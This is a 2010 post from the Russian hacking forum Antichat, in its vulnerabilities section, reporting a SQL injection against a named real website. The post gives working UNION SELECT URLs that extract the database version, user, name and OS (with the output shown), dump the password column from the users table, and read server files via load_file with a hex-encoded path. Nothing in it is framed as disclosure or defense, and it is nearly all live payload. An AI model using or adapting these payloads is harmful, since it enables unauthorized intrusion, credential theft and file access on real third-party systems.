ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 25.05.2010, 20:32
Аватар для AC//DC
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+select+concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),2,3,4, 5+--

version : 4.1.22-log
user : u15962@localhost
database : u15962
os : portbld-freebsd6.2

ненашёл таблицу с именами юзверей только pwd

http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+select+group_concat(pwd,0x3a+SEP ARATOR+0x0b),2,3,4,5+from+users+--

есть доступ к чтению файлов

http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+select+load_file(0x2f686f6d652f) ,2,3,4,5+from+users+--
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ